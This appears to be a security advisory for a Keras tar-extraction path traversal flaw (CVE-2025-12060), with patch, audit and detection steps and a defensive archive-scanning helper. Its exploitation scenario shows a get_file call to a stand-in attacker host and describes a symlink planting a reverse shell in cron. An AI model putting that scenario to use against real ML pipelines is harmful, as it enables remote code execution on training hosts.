CVE-2025-12060: keras: Path Traversal enables file access

GHSA-hjqc-jx6g-rwp9 CRITICAL PoC AVAILABLE
Published October 30, 2025
CISO Take

Upgrade Keras to 3.12.0 immediately; upgrading Python to 3.13.4 alone does NOT fix this, as both components must be patched. Any ML pipeline calling keras.utils.get_file with extract=True against a remote or untrusted tar archive is exposed to arbitrary file write on the host filesystem, which trivially escalates to code execution. Audit all training and data ingestion automation for this pattern before your next pipeline run.

Risk Assessment

Critical risk for ML training infrastructure despite a low current EPSS score (0.00122). The CVSS 9.8 reflects zero prerequisites: no authentication, no privileges, no user interaction, fully network-exploitable. Real-world risk is highest in automated MLOps pipelines that fetch and extract remote datasets, an extremely common pattern. The dual-fix requirement (both Python and Keras must be updated) creates a high probability of incomplete remediation, leaving environments that appear patched still vulnerable.

Affected Systems

Package Ecosystem Vulnerable Range Patched
keras pip <= 3.11.3 3.12.0

Do you use keras? You're affected.

Severity & Risk

CVSS 3.1
9.8 / 10
EPSS
0.1%
chance of exploitation in 30 days
Higher than 28% of all CVEs
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
medium
Public PoC indexed (trickest/cve)
Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): None
Scope (S): Unchanged
Confidentiality (C): High
Integrity (I): High
Availability (A): High

Recommended Action

5 steps
  1. PATCH

    pip install 'keras>=3.12.0'. A Python upgrade alone is NOT sufficient; both components must be updated.

  2. AUDIT

    Search all codebases and pipeline configs for keras.utils.get_file calls with extract=True; flag any that pull from external or untrusted URLs.

  3. WORKAROUND

    If patching is delayed, download tar archives separately and extract them with tarfile.extractall(filter='data') before processing; the 'data' filter rejects symlinks, absolute paths, and '..' traversal members.

  4. ISOLATE

    Run ML training in containers with AppArmor/seccomp profiles and filesystem mounts restricted to expected data directories.

  5. DETECT

    Alert on filesystem writes outside designated ML data directories during training jobs — unexpected writes to /etc, /usr, ~/.ssh, or Python site-packages during an ML run indicate active exploitation.

CISA SSVC Assessment

Decision: Track
Exploitation: none
Automatable: No
Technical Impact: total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
  Article 15 - Accuracy, robustness and cybersecurity
  Article 9 - Risk management system
ISO 42001
  A.6.2 - Responsibilities related to AI system suppliers
  A.9.1 - AI system vulnerability handling
NIST AI RMF
  GOVERN 1.1 - Policies and processes are in place to manage AI risks
  MANAGE 2.2 - Mechanisms are in place to sustain value of deployed AI systems
OWASP LLM Top 10
  LLM05 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2025-12060?

CVE-2025-12060 is a path traversal vulnerability in the keras.utils.get_file API. When called with extract=True on a tar archive, Keras extracts it via Python's tarfile.extractall without the filter='data' safeguard, so a malicious archive containing crafted symlinks can write arbitrary files anywhere on the filesystem, which trivially escalates to code execution. Remediation requires upgrading both Python (for the underlying CVE-2025-4517) and Keras to 3.12.0 or later.

Is CVE-2025-12060 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2025-12060, increasing the risk of exploitation.

How to fix CVE-2025-12060?

1. PATCH: pip install 'keras>=3.12.0'. A Python upgrade alone is NOT sufficient; both components must be updated.
2. AUDIT: Search all codebases and pipeline configs for keras.utils.get_file calls with extract=True; flag any that pull from external or untrusted URLs.
3. WORKAROUND (if patching is delayed): Download tar files separately and extract them with tarfile.extractall(filter='data') before processing.
4. ISOLATE: Run ML training in containers with AppArmor/seccomp profiles and filesystem mounts restricted to expected data directories.
5. DETECT: Alert on filesystem writes outside designated ML data directories during training jobs; unexpected writes to /etc, /usr, ~/.ssh, or Python site-packages during an ML run indicate active exploitation.

What systems are affected by CVE-2025-12060?

This vulnerability affects the following AI/ML architecture patterns: training pipelines, data ingestion pipelines, MLOps automation, model serving.

What is the CVSS score for CVE-2025-12060?

CVE-2025-12060 has a CVSS v3.1 base score of 9.8 (CRITICAL). The EPSS exploitation probability is 0.10%.

Technical Details

NVD Description

The keras.utils.get_file API in Keras, when used with the extract=True option for tar archives, is vulnerable to a path traversal attack. The utility uses Python's tarfile.extractall function without the filter="data" feature. A remote attacker can craft a malicious tar archive containing special symlinks, which, when extracted, allows them to write arbitrary files to any location on the filesystem outside of the intended destination folder. This vulnerability is linked to the underlying Python tarfile weakness, identified as CVE-2025-4517. Note that upgrading Python to one of the versions that fix CVE-2025-4517 (e.g. Python 3.13.4) is not enough. One additionally needs to upgrade Keras to a version with the fix (Keras 3.12).

Exploitation Scenario

Adversary hosts a malicious dataset archive at a URL that appears legitimate — either via a typosquatted dataset mirror, a compromised data host, or a man-in-the-middle on an HTTP download. An MLOps pipeline or data scientist calls keras.utils.get_file('https://attacker-host/imagenet-subset.tar.gz', extract=True). The tar archive contains a symlink entry resolving to /etc/cron.d/ml-runner, followed by a file entry that writes a reverse shell payload to that symlink target. Keras calls tarfile.extractall without filter='data', the symlink resolves outside the destination, and the payload lands on the host. On next cron tick, the attacker has RCE as the ML training user — often with GPU cluster access, model weights, and training data.
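For pipelines that cannot yet rely on the filter parameter, a pre-extraction scan can flag the archive members this scenario depends on. scan_tar_members is a hypothetical helper sketched for illustration; it is not part of Keras or the standard library, and extractall(filter='data') remains the preferred control where available.

```python
import tarfile


def scan_tar_members(archive_path: str) -> list[str]:
    """Return names of suspicious members: symlinks, hard links,
    absolute paths, or names containing '..' path components.
    Illustrative pre-check only; it inspects metadata and does not
    extract anything."""
    suspicious = []
    with tarfile.open(archive_path, "r:*") as tar:
        for member in tar.getmembers():
            if member.issym() or member.islnk():
                suspicious.append(member.name)
            elif member.name.startswith(("/", "\\")):
                suspicious.append(member.name)
            elif ".." in member.name.split("/"):
                suspicious.append(member.name)
    return suspicious
```

A pipeline would call this on the downloaded archive and refuse to pass it to keras.utils.get_file or any extractor if the returned list is non-empty.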

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Timeline

Published
October 30, 2025
Last Modified
December 2, 2025
First Seen
October 30, 2025

Related Vulnerabilities